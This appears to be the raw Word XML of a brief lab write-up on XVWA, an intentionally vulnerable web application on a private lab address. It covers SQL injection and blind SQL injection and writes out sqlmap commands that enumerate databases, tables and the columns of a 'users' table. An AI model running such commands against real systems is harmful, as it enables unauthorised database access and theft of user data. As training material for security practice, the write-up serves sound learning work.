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D0D0" w14:textId="4C7342F7" w:rsidR="00FF3EF0" w:rsidRDefault="004B2E75" w:rsidP="004B2E75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4B2E75">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>XVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDCCB81" w14:textId="3D780288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006002F" w14:textId="4141F0AD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9BB0261" w14:textId="3656FB6F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1F8B401" w14:textId="7D1E6CAA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33BC1F4" w14:textId="768C5B6B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19C1767" w14:textId="5C3A83E3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BE28185" w14:textId="4B8F9964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EFC7581" w14:textId="1634D073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32D858D" w14:textId="0469276D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11A32BA" w14:textId="7518E7E5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785210B" w14:textId="29518FB8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9034ED3" w14:textId="4EF3CB58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9CCCEE0" w14:textId="41295465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9978B9E" w14:textId="75D41FEF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5DA1779" w14:textId="7AC35C56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3BA5836" w14:textId="0ED6EAF5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6007C96" w14:textId="3BB8808D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02876F1" w14:textId="1B67CD9A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8473C72" w14:textId="5FE6E7C2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855F18B" w14:textId="542022D5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FE52E33" w14:textId="462A5F26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2912220" w14:textId="74D6FFFC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72768FE" w14:textId="3F479A5A" w:rsidR="004B2E75" w:rsidRDefault="00B36F5F" w:rsidP="004B2E7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HOME Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F93607" w14:textId="109A6F1F" w:rsidR="00B36F5F" w:rsidRDefault="00B36F5F" w:rsidP="004B2E7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URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="003D2E40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http://192.168.56.105/xvwa/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DA73232" w14:textId="1FC04EAC" w:rsidR="00B36F5F" w:rsidRDefault="00B36F5F" w:rsidP="004B2E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36F5F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 wp14:anchorId="51850BB4" wp14:editId="2F96DC2D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943600" cy="53105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80E77" w14:textId="327DD0CE" w:rsidR="00B36F5F" w:rsidRPr="00B36F5F" w:rsidRDefault="00B36F5F" w:rsidP="004B2E7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23424A" w14:textId="49896CF5" w:rsidR="004B2E75" w:rsidRDefault="004B2E7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825DF33" w14:textId="4B899072" w:rsidR="00B36F5F" w:rsidRDefault="00B36F5F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777410C" w14:textId="35076F2F" w:rsidR="00B36F5F" w:rsidRDefault="00B36F5F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941216E" w14:textId="52AC847A" w:rsidR="00B36F5F" w:rsidRDefault="00B36F5F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F631E8D" w14:textId="5897E615" w:rsidR="00B36F5F" w:rsidRDefault="00B36F5F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6628BD2" w14:textId="3463C15F" w:rsidR="00B36F5F" w:rsidRDefault="00F766E1" w:rsidP="004B2E75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SQL injection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FE2BEE" w14:textId="5C220469" w:rsidR="00F766E1" w:rsidRDefault="00F766E1" w:rsidP="004B2E7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766E1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anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="57D6A376" wp14:editId="201028B5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943600" cy="42735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Url :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hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="003D2E40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http://192.168.56.105/xvwa/vulnerabilities/sqli/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FC9E14C" w14:textId="26F66532" w:rsidR="00F766E1" w:rsidRDefault="00F766E1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59506E7" w14:textId="0A301870" w:rsidR="00F766E1" w:rsidRDefault="00F766E1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22640C0" w14:textId="408EEB34" w:rsidR="00193AFC" w:rsidRDefault="00193AFC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5E201A2" w14:textId="0A65723B" w:rsidR="00193AFC" w:rsidRDefault="00193AFC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0DBF4C2" w14:textId="4149A093" w:rsidR="00193AFC" w:rsidRDefault="00193AFC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0A20909" w14:textId="23416BBF" w:rsidR="00193AFC" w:rsidRDefault="00193AFC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FCF512F" w14:textId="6F6A46E5" w:rsidR="00193AFC" w:rsidRDefault="00193AFC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B2EC2B0" w14:textId="2BEFD1C0" w:rsidR="00193AFC" w:rsidRDefault="00193AFC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A4E773C" w14:textId="1F411363" w:rsidR="00193AFC" w:rsidRDefault="00193AFC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E918799" w14:textId="07D9AEAC" w:rsidR="00193AFC" w:rsidRDefault="00193AFC" w:rsidP="004B2E75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2.Blind Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450EB4E8" w14:textId="4EC48350" w:rsidR="00193AFC" w:rsidRDefault="00193AFC" w:rsidP="004B2E7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EE753E" w14:textId="5F0C3CC0" w:rsidR="005D2955" w:rsidRDefault="005D2955" w:rsidP="004B2E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2955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anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D918A1D" wp14:editId="73836A8A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>588010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="32569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Code: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D2955">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D2955">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlmap -url "http://192.168.56.105/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D2955">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>xvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D2955">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>/vulnerabilities/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D2955">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sqli_blind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D2955">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">/" -data "item=&amp;search=1" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D2955">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D33B78C" w14:textId="139B1357" w:rsidR="005D2955" w:rsidRDefault="005D2955" w:rsidP="004B2E7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41B6F7" w14:textId="68A05629" w:rsidR="005D2955" w:rsidRPr="005D2955" w:rsidRDefault="005D2955" w:rsidP="004B2E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2955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anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="045C943E" wp14:editId="6A166365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943600" cy="1663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Database we found </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5612CF" w14:textId="77F0073C" w:rsidR="00193AFC" w:rsidRDefault="00193AFC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E527811" w14:textId="10235683" w:rsidR="005D2955" w:rsidRDefault="005D295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6BA9085" w14:textId="2E47093F" w:rsidR="005D2955" w:rsidRDefault="005D295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63A81F0" w14:textId="3D97BC0A" w:rsidR="005D2955" w:rsidRDefault="005D295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1159C2F" w14:textId="67109122" w:rsidR="005D2955" w:rsidRDefault="003404FD" w:rsidP="004B2E75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Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4544CFDC" w14:textId="19882ECA" w:rsidR="003404FD" w:rsidRDefault="00B8511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5115">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07089422" wp14:editId="1877B4EE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4092575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="29095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5115">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="58D0163A" wp14:editId="450C07E7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943600" cy="34309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4FD" w:rsidRPr="003404FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>udo sqlmap -url "http://192.168.56.105/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003404FD" w:rsidRPr="003404FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>xvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003404FD" w:rsidRPr="003404FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>/vulnerabilities/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003404FD" w:rsidRPr="003404FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sqli_blind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003404FD" w:rsidRPr="003404FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">/" -data "item=&amp;search=1" -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003404FD" w:rsidRPr="003404FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>xvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003404FD" w:rsidRPr="003404F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–</w:t>
      </w:r>
      <w:r w:rsidR="003404FD" w:rsidRPr="003404FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D3F9C8" w14:textId="4364D51E" w:rsidR="00B85115" w:rsidRDefault="00B85115" w:rsidP="004B2E7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E8B55F9" w14:textId="28F5DFE6" w:rsidR="007134AC" w:rsidRPr="00B85115" w:rsidRDefault="007134AC" w:rsidP="004B2E7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B2DB9F" w14:textId="05B0D79A" w:rsidR="007134AC" w:rsidRDefault="00D344E9" w:rsidP="004B2E7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344E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="265A0157" wp14:editId="6C4BD814">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>956945</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="21539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4AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>code:</w:t>
      </w:r>
      <w:r w:rsidR="007134AC" w:rsidRPr="007134AC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D344E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D344E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlmap -url "http://192.168.56.105/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D344E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>xvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D344E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>/vulnerabilities/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D344E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>sqli_blind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D344E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">/" -data "item=&amp;search=1" -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D344E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>xvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D344E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T users –columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCB4E88" w14:textId="68B71ABC" w:rsidR="00D344E9" w:rsidRDefault="001D7654" w:rsidP="004B2E7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D7654">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1D579AD1" wp14:editId="53897D4E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2667635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="23850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1FAC1" w14:textId="09645254" w:rsidR="00D344E9" w:rsidRDefault="00D344E9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A5F5E5E" w14:textId="5C98FF76" w:rsidR="00B85115" w:rsidRDefault="00B85115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48D41CF" w14:textId="6EE96836" w:rsidR="001D7654" w:rsidRDefault="001D7654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B4FC12D" w14:textId="0DB2A202" w:rsidR="001D7654" w:rsidRDefault="001D7654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8FDE538" w14:textId="5F4F5B8D" w:rsidR="001D7654" w:rsidRDefault="001D7654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27811A2" w14:textId="53492C6C" w:rsidR="001D7654" w:rsidRDefault="001D7654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93A0A65" w14:textId="77777777" w:rsidR="001D7654" w:rsidRPr="004B2E75" w:rsidRDefault="001D7654" w:rsidP="004B2E75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1D7654" w:rsidRPr="004B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17"/>
    <w:rsid w:val="001167D2"/>
    <w:rsid w:val="00193AFC"/>
    <w:rsid w:val="001D7654"/>
    <w:rsid w:val="003404FD"/>
    <w:rsid w:val="004B2E75"/>
    <w:rsid w:val="005D2955"/>
    <w:rsid w:val="007134AC"/>
    <w:rsid w:val="00714D41"/>
    <w:rsid w:val="00794C40"/>
    <w:rsid w:val="008A6FBC"/>
    <w:rsid w:val="00B02717"/>
    <w:rsid w:val="00B36F5F"/>
    <w:rsid w:val="00B85115"/>
    <w:rsid w:val="00D344E9"/>
    <w:rsid w:val="00F63A74"/>
    <w:rsid w:val="00F766E1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CD19"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{66F64A01-996A-4DFC-ADFA-CC0DE7D9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192.168.56.105/xvwa/vulnerabilities/sqli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192.168.56.105/xvwa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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-18T12:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-19T16:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>